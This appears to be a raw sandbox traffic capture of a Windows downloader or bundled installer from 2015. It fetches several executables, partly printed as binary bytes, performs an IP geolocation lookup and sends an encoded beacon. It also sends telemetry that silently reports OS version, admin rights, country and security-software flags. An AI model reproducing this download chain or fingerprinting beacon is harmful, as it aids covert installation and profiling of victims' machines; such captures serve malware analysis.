Host: mpjqoj7o-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:07 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Sat, 01 Aug 2015 04:17:07 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /web/gf/all/setup.exe_e HTTP/1.1

Host: dl.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:39 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1438313686"

Last-Modified: Fri, 31 Jul 2015 03:34:46 GMT

Cache-Control: max-age=461

Content-Length: 2113807

Content-Type: text/plain

X-HW: 1438402659.dop003.fr7.t,1438402659.cds030.fr7.c
@d-.W,.....:.q.jJ...... .S.|4s........... .P}YaO.`..W<.W.h,...d.!$.
!.N..........h_.TCX.:5.........].........,C.24....Q.P.J.....%@.4..U.1.
dW......9Q....-E&y\x...`}T./&...?..Z :8......7.......A.|s..*.Wt...D<
;.!;k...9.<...~:..!W..|.......(M...A.Ys...8...M.NJtd...A.di.tgR.@m.
.G"..:36-".h....M.vkt...lN..h....w- w...}...........y..L..Q-..z.....rT
O..k8...'..L.u.X.}.E.Er.Zs..2.Y:.9......A.Ko.....:.X...t.>.B.P..?.S
.aY.!G....z.V.....>...{.......oIX.x.,..*...@.(...`.Z.. d`.JH....m..
...&.....|eB...~MG.....X&!..<....U-.<.H..t.?V{.*.....'...[..9~.&
gt;...............4.a. ...............I...{..~....U....../c.w...}.B.V.
c......6.........../..$1 t.y.KZy.45)..>...d.U:* ...}...C..m..-E..k.
v....................;..u.;.:....%R.....d........,I......{vQX.)..PR..E
d.....(..VI..'Cj..j..2T..i.c7..r..........b.B.{...x{..'s..;._.>...#
2j4...F.....p.X.@(Z,T3ED&N.c..g...qg....?..-.R.....S..ag..>T.......
.".......f^_........J.......){,[email protected]........&.....OhO..........
!......-....x..i......).W.>.V.hJ._.So....._...'...M.p....^D..r.e.5.
..../[email protected](...yM....(KW.O.{......z@...)J....s.W]l".a......
...\....D{._..BkgJ@5..../.....J.r...0....bsu..Q..=B.lDzc..P..T'.....^[
.......I.e......%[.F..r......|x.......A.&.....y^w[.rn..z...........'..
.&&...d..H.......nod..).g...[V^....|.R."O5Z%.N....M..s35d4....P...\'.o
%#K..:.>..>...J..cxD..m.|.'.(..Ts...`........,..yA2..V.w..."".s.
... i.R...j6Ea\gq.e..L<AA..;px....W..o(....F).{......2Po.4Pf......8
..,.d.L._.).dQZ...6:..*{....;h..u,xC)......._.v<[._D..:Q..e....<<< skipped >>>

GET / HTTP/1.1

Host: ipgeoapi.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:52 GMT

Connection: keep-alive

Content-Type: application/json;charset=utf-8

Content-Length: 40

Server: thin 1.4.1 codename Chromeo

Via: 1.1 vegur

{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Sat, 01
 Aug 2015 04:17:52 GMT..Connection: keep-alive..Content-Type: applicat
ion/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codenam
e Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..

GET /spdbt/shoppy/snsch7.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dl.ourinputinfonet.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:00 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1438276472"

Last-Modified: Thu, 30 Jul 2015 17:14:32 GMT

Cache-Control: max-age=1116

Content-Length: 228352

Content-Range: bytes 0-228351/228352

Content-Type: application/x-msdownload

X-HW: 1438402620.dop002.fr7.t,1438402620.cds001.fr7.c

Content-Disposition: attachment; filename="snsch7.exe"

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1.S.u}=.u}=.
u}=.|...p}=.u}<.|}=.x/..t}=.x/..t}=.Richu}=........................
.PE..L...rt.T..................................... ....@..............
............0..............................................` ..<...
......................................................................
........... ..,............................text...[...................
........ ..`.rdata..n.... ......................@..@..................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................U.........E........E
.....E..}.....}......k.....`......h......`...Pj.... @.j.h....j.j.j.h..
.@hR @.... @..E...., @..M..U.....U..N @..E.j.h....j.j.j.h......`...Q..
. @..E.j.j..U.R.E.P... @..E......E........M.....M..U.;U.}Mj..E.Pj..M.Q
.U.R... @..E.%....y.H...@.... @...U.3..U.j..E.Pj..M.Q.U.R... @....E.P.
.. @.j.j.... @.PhR @.j.j...$ @.j.... @.3...]..........................
......................................................................
..................................................................

<<< skipped >>>

GET /t.ashx?e=KC46TpkJIZxD761tAXRB5U7/thpU6drhyMlYLXuYTiSJSpJdq6tfQEEt4u7lqt3szjf8TpbxLO738863hYmkYTdCD9FwPsb7YCpHZc9ZUaGLbhvor/ikhRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: dnnw5pp7-zxis6jz8.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:00 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

abfgshdgfjhsk....

GET /t.ashx?e=KC46TpkJIZxD761tAXRB5U7/thpU6drhyMlYLXuYTiSJSpJdq6tfQEEt4u7lqt3szjf8TpbxLO738863hYmkYTdCD9FwPsb7YCpHZc9ZUaGLbhvor/ikhRQC drCF7eFysWDrahxHN3E0H2E /K1uqPiYRVVMKy/yijAfjje/ktUzPMZleL5 XpkvY14xYJ8 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: dnnw5pp7-zxis6jz8.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:00 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

abfgshdgfjhsk....

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: dnnw5pp7-zxis6jz8.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:01 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 13

Connection: keep-alive

Cache-Control: private,no-cache, no-store

X-AspNet-Version: 2.0.50727

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

abfgshdgfjhskHTTP/1.1 200 OK..Date: Sat, 01 Aug 2015 04:17:01 GMT..Con
tent-Type: text/html; charset=utf-8..Content-Length: 13..Connection: k
eep-alive..Cache-Control: private,no-cache, no-store..X-AspNet-Version
: 2.0.50727..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X-Cache:
 MISS..abfgshdgfjhsk..

GET /spdbt/shoppy/snsch7.exe_a HTTP/1.1

Host: dl.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:39 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1438276436"

Last-Modified: Thu, 30 Jul 2015 17:13:56 GMT

Cache-Control: max-age=1461

Content-Length: 2088396

Content-Type: text/plain

X-HW: 1438402659.dop008.fr7.t,1438402659.cds037.fr7.sr,1438402659.dop005.dc1.r,1438402659.cds007.dc1.c,1438402659.cds037.fr7.pr

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
.....................n......-A............@...........................
......./........ ..............................p.......0...o..........
......................................................................
...........................text...<........................... .0`.
[email protected]$.......&.............
[email protected]@.bss..................................0..idata.......p.......
[email protected]........... [email protected].
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..WVS.......U..E....t.
..F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E..
.$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT.
.......FP..E........}..VP........U.......FT.............}..........E..
M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q...
.~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX.
.$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\
.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..

<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=0-249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:01 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: Ff0tvEZ7TNf0Ib5reYtPfrKedAC4/rcfjvUMu8VaTnj20Erg0QhkbbwSB0nUis97

x-amz-request-id: 71D5806249DDB72C

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Accept-Ranges: bytes

Content-Range: bytes 0-249999/7202374

Server: NetDNA-cache/2.2

X-Cache: MISS
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1p.:u..iu..i
u..i...iw..iu..i...i...id..i!2.i...i...it..iRichu..i........PE..L.....
oS.................\...........2.......p....@.........................
.................................................s....................
...................................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u....r@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Tp@[email protected]
....E..9}[email protected].}.j.W.E......E.......@[email protected]..
[email protected]<[email protected] [email protected]...\r@._
^3.[.....L$...7B...Si.....VW.T.....tO.q.3.;5.7B.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=750000-999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:03 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ORIgKUFYzPctLonZ5sfU7Xm3Z/awsU4YVXbTn9Fmq0VTapofoeLgak1kmhNPuP1v

x-amz-request-id: FD6CA1343228A6E2

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: MISS

Content-Range: bytes 750000-999999/7202374
uUF..9.{(j....6...-...l.~x8[7.U...$.WB....O.b.5.|.].....Q3B.m...`H..b.
h.s.lzc.M.a. ..iq.G...5.'Q..<k}..&...1.#.QVs.g.s.Z..U....X.J!.w.6..
...'=N?:X.Q...o.H.\........L.....#......../V...q..,TK1*v_.ZrbxK..@..&l
t;.OZ.....e.u.......dW.....uSa.a:-.i..%...............g..II.Y.[...$t.`
.A./[email protected]..`5..;....c...E.....
.Y..)..:]..._.....~....E....d....o.3.w4%>dI0..?..vl=.....hw..].....
...[P!.=..b.|.'z4.Z.*.\.........}.%....Zp........jL..BI..X..0....~...3
e...o....{x)D..WM.t._.m)/].5.$.............).y.%.NZP4.Y...q..|..:P..B)
r...l...-,a.i;.'L....{.5%uh.6.IZ..9.)M...f..`."1.dl..........a0:.-u..)
...H%.>.R.zP70....Z6*.Hw...,.....L..L..S=....b.%@.r.Y.CM.....=2v...
..FyId.}...T..76...xT..}......zr.._....... ....1).....:.....<..&jgW
.......=|.W..s.....W....bI..).!D............Ue....o.`..=.D.^.._...~.."
..#...EQH.1.........F..)=.....~...r......{n.;.....G....Xv?..6.c.......
x.....Q ...K..t=e....yo..[.>.C.9{N.5.?...AN,j}.. ....IM.u....)\~.1.
.Nuk.3AO.5M.m...,.l.(...mD>.`..&([email protected].(WU....s.....sT.Q..
.3..r2..[.c..>0:.i..o......#.3.....cR0z.C..........s..D.....qbz32..
..u...P..=\,v.n....[...\eMi..#j.&.BR..].Mx6X.N.E..u(b...0...a.(....C..
..o...r.nc....=...x..)Eq.K,v...q.5..1dW. ...9%z.....`[email protected].&...
%.U..M....Y..j=u....te.P...=.c..v.G...u..h.a..ZNim-).t..". ....S.!..).
o.S.....i..r.Z..!..u...1e'q.n%b;.k.Y,... ....._...)`........ .......$.
.*.C.).O5..g...x.7.9p./]."..k.g 26.op..........lR.......E..&.u...d..7.
z.... ..........].....NF..q..........n.....6.......^o.8....R....5a<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=2750000-2999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: zh9k747-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Sat, 01 Aug 2015 04:17:08 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: ORIgKUFYzPctLonZ5sfU7Xm3Z/awsU4YVXbTn9Fmq0VTapofoeLgak1kmhNPuP1v

x-amz-request-id: FD6CA1343228A6E2

Last-Modified: Fri, 31 Jul 2015 10:00:03 GMT

ETag: "cde1c35e2f6381a5adbd18b2b0a1e929"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 2750000-2999999/7202374
....;..8....*.&..4.t..w........d......!CK...xT...k.......R....! ...6..
..U.C...F=..C.y.c..D.N.y]a..."....y.kK$..'F.c.........N.....\..J..*YC.
..XYq........D_.E..5...Ox.r.->[email protected]...{io..T...OF.v......Nl...s
....y.;a\2...Yf]lHV.9Qq.$.....D.....ve...O...1......r....z.....z..Q...
;'.fRv...g=..*..'[email protected]....;v..Hb...$.><....v..........
..qA.y.~..y....kvP5..r.Nn.k.}9.Bxus..p?..}.5. ......3^....n...PI...f..
..InJ......V...6..>..z.q.L..Kg.~...$.V|.i..._..}c...V.R. .P........
....xG.I....3.n.m....j....0.,Ko.&.7...p.{.......j..%o.....1..Kp_....(.
2.....7....,....Z.....A....z.. .h V.O'%.76S&...[n...~...d ..'..=..b...
!u.....Y.......S.....bU.KO..h.l..W....d.o..M.....v...Y.IO....^...k....
...o-..'A..W.._E..F#.~..&K.....B.g.D....G/.....%.. v.1......7f......kS
..3.l.v#Ep...?.^.....q.z\.A...<....%..}...5...E#.y..<..N..s[.W.T
...g-...^[email protected](8...............yj.t...)
."y........pM........F|K..c..cW...g............?B%$,.C._?...X.!.Q).Ews
c... \.G.^....R.'>..wh.*.p..k:}.>.....-e.....k;y6.(.n2.K.....?.N
.#...v..%K.W..S...:..........}.H...ra.....S.%.../K....`[email protected]..`..
\A...........C.z...\...p:E...hD..T..!F...a......]K.ki.o*o(.D... .....7
..)V...S.0.X(!?PM......(1q.~...N..=M.NsO.N....|.......(.-1..ywz.._uu..
j..G....a...@....%.e.R..Y.A.......C.se.......6i...............:..?....
.n..f...W..&B.9Tt.oP..z~D..g...b.....g.=./}r....._h.Av....K...C.^F.aj 
 .gp2(...9CO...N..m..&.A_..r\V%...".n&...0..n........X_.}%..L^..^t..A.
/.e..$...L.2..e.^....w.n...i.JB...Qa.B6.a.....,.../JN...`.Pg..8..)<<< skipped >>>

GET /web/gf/all/setup.exe_b HTTP/1.1

Host: dl.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

Date: Sat, 01 Aug 2015 04:17:39 GMT

Keep-Alive: timeout=5, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1438313678"

Last-Modified: Fri, 31 Jul 2015 03:34:38 GMT

Cache-Control: max-age=461

Content-Length: 2113811

Content-Type: text/plain

X-HW: 1438402659.dop004.fr7.t,1438402659.cds019.fr7.c
......?..e`!..{..K.....p....c..6..-....U....I...iq.2..-. K8X:.....p.Mc
d~..).[..$*......UL...J.p...I...oh..#3..7.8E.V....i.Y.....3.N.b^!.UWA.
P_..Nd.DAZ...Hr...8S.-~%xY.*1...mS)"Yb....w"{L.h.D.M ......l..5CT.I.C.
:..'....._<!!b.M..#..v8|.1.aO.O<..24.y..Nc....m.T......u/a...v..
.d..n....i.z.z.....]mB..D......j.b.d~C..1Je].3...F..b.I6.G..........!.
1.{...rG.H.^..D..f.B.. ...?wx@(......<..8.9XO..%...f.Y.\:.C|...U_uN
._dZ....18.,Cr.Ej..z.......(<4!..iR...z`.@8.....:_H..>.m#....I:.
D.....8. ....w.FsNF.k..M...Z.TT.-Q....r"D5.ey.&X.4..H.AW=...QJ["d0. cj
7^......*.p.W........... ........l/..NqY.Tp..H. h.&c...SR9...aOz..U...
....31qq...".C:.......<..Cb.......u....?......`KX.9F.k....[2 t[...{
....IO..........d.....{e&...k...d,.X(z.UiI..l.,J.V<..g..##6?.F.Q...
....m....BY.VF..`....d..k..jmg../....J\..=#[D../......>..i.&d......
.et....#....K..PP.X.9_.P........s")..&.b~.~.r<(b...[.VE.../?..>.
.s..h.|.T...P...........d#..<..L...k...<........b ..z."...>\.
....J.X.k!I.|tK".V...:N...|\...0.qL..V.....5......Y.y2$x.2..*..}b.)...
9....RQ.Cc...x....,1..&.s...x.........[.W,.o......^.....1......L.J..C.
 ....Y.....X..$...e. '..CL.s...A...o.[f...P\..=.RL\HM.qy..l.....p....C
/|......G;...S..M....c........b...lv.."yI...P....j0?.E.}Pu.x......a.n.
.X.sb....k$G&.....|.j.d..-t>>.E..0.?......::..Yx.ŒZ..^."....o.
M..^j.7P0!....f.......C....\..w<..O.[...-l;.P.Kn.:.,.../.-..a..-...
.....8._.7al..OW..a.3._......c.}.D.l*e.B.z....T.....>.x$.EW..e.....
.Pj.x..%p...A.@@L.6...]{.B..Qy..I.1...m.3....F...z!.2X..`&..A.....<<< skipped >>>

GET /utility.gif?report=fdata&f=1&c=000803&i=100&n=init_start_funnel_step_name&rnd=1438402673 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: dAw/liqqWTYvkgrTuvEXvpnkrLTMvVUD1tlOzMJdvpzmaY2IOqSn2XigsWsK38oL

x-amz-request-id: 908EBC47E196F56B

Date: Sat, 01 Aug 2015 04:17:47 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: dAw/li
qqWTYvkgrTuvEXvpnkrLTMvVUD1tlOzMJdvpzmaY2IOqSn2XigsWsK38oL..x-amz-requ
est-id: 908EBC47E196F56B..Date: Sat, 01 Aug 2015 04:17:47 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /installer-error.gif?action=sesamy&app=70299&appver=0&ver=1_36_01_22&version_date=15-07-30&bic=13b4b43ecfec3569c696888aa234740eIE&verifier=e779ddeb30ff0167256d26524544a5f7&upi=13b4b43ecfec3569c696888aa234740e&procid=917D2960B3D84DB6B81D64AD35FD7055PI&srcid=000803&subid=0&zdata=eyJkYXRhIjp7ImRhdGUiOiJGNlN6b2JyZGMxLDk5OTk5OTk5LTk5OTktNGE1OS1iZWEwLWVlYTgzZmI5NWZjOSwiLCJ1bnEiOiI5OTk5OTk5OS05OTk5LTRhNTktYmVhMC1lZWE4M2ZiOTVmYzkifX0=&browser=ie&browserver=X&default=ie&chver=na&ffver=na&iever=&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=17179873281&asw=0&asw2=1073750528&asw3=-2147483648&asw4=2048&crtnm=na&procstarttime=1438402673&procruntime=8&rnd=1438402681 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: ytO4vJkZmgPQsPE8ZicOKg/TazF ALRsecC1BdiqeStkpJUHZpXeANopYNI0pcoW

x-amz-request-id: A59EC85101E4A3BC

Date: Sat, 01 Aug 2015 04:17:54 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:37 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: ytO4vJ
kZmgPQsPE8ZicOKg/TazF ALRsecC1BdiqeStkpJUHZpXeANopYNI0pcoW..x-amz-requ
est-id: A59EC85101E4A3BC..Date: Sat, 01 Aug 2015 04:17:54 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 23 Jun 2015 12:54:37 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=000803&i=200&n=init_end_funnel_step_name&rnd=1438402681 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: Oky38/eCjy7OODYBI1fP/OxbXrD25SWkNMboQyZJZlG8zId  Z3qHmxi6iYpe4A6

x-amz-request-id: ED98BA1FD40EE246

Date: Sat, 01 Aug 2015 04:17:54 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=300&n=deploy_start_funnel_step_name&rnd=1438402681 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: bU0dbyk Dftpq2 aHCublVFqY3XSHtptEAjtmGs kPtcheT67Y6RhdtK7C0P1KQd

x-amz-request-id: 9CE2FBF16301DA57

Date: Sat, 01 Aug 2015 04:17:54 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: bU0dby
k Dftpq2 aHCublVFqY3XSHtptEAjtmGs kPtcheT67Y6RhdtK7C0P1KQd..x-amz-requ
est-id: 9CE2FBF16301DA57..Date: Sat, 01 Aug 2015 04:17:54 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=000803&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1438402683 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: x64Ya5m3gvMwWeOcnb21csBeUPVgaBIh3MuyZEjOndX8N0bPlA7OPp0J9X0ltkIj

x-amz-request-id: FFFB3079D52EB7D7

Date: Sat, 01 Aug 2015 04:17:56 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3

GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: x64Ya5
m3gvMwWeOcnb21csBeUPVgaBIh3MuyZEjOndX8N0bPlA7OPp0J9X0ltkIj..x-amz-requ
est-id: FFFB3079D52EB7D7..Date: Sat, 01 Aug 2015 04:17:56 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....

GET /utility.gif?report=fdata&f=1&c=000803&i=500&n=deploy_notification_start_funnel_step_name&rnd=1438402684 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: CxVNWPPE639J9rX/UW3TEAUhNim/VC66u9YXddC2RPcGOatR6ui9CeEBZ4m8D0Eq

x-amz-request-id: 037D76B3B4714689

Date: Sat, 01 Aug 2015 04:17:57 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1438402684 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: Hw2JgDrr7f95bxQRSadU1mXiG6EPIO7BHJgKe3VbS4iid2xS/f7WKmDXUNQPAwpw

x-amz-request-id: E9DEABF7C8FAD906

Date: Sat, 01 Aug 2015 04:17:57 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=700&n=deploy_ch_start_funnel_step_name&rnd=1438402684 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: ew36Rl1lQpGzRXUzIUsRKSDKq61H04aeworP BGzCnqiUj2sJLYh3i2agE9Ww0Z4

x-amz-request-id: 8E9C3E8FDD41CDDD

Date: Sat, 01 Aug 2015 04:17:57 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=800&n=deploy_nova_start_funnel_step_name&rnd=1438402684 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: u8L8g OcpDPUE/DAvWyxq1crzIJfvQnFHa3VbGDePy83DEaEhC9Nz8jdcc1F6B45

x-amz-request-id: 5E6BDDB578CBE407

Date: Sat, 01 Aug 2015 04:17:57 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"

Content-Type: image/gif

Content-Length: 35

Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=000803&i=900&n=deploy_ff_start_funnel_step_name&rnd=1438402684 HTTP/1.1

Host: errors.globalnodemax.com

Connection: Keep-Alive

Cache-Control: no-cache


HTTP/1.1 200 OK

x-amz-id-2: UCaQ3gC7IavD5/gUoUwiGCFKzL9VedOUAOyl921qMR5J7fFko5FZDlcNYsef0luo

x-amz-request-id: BE10D10CFB0F8265

Date: Sat, 01 Aug 2015 04:17:58 GMT

Expires: Mon, 26 Jul 1997 05:00:00 GMT

Cache-Control: no-cache, must-revalidate

Last-Modified: Tue, 23 Jun 2015 12:54:41 GMT

ETag: "28d6814f309ea289f847c69cf91194c6"
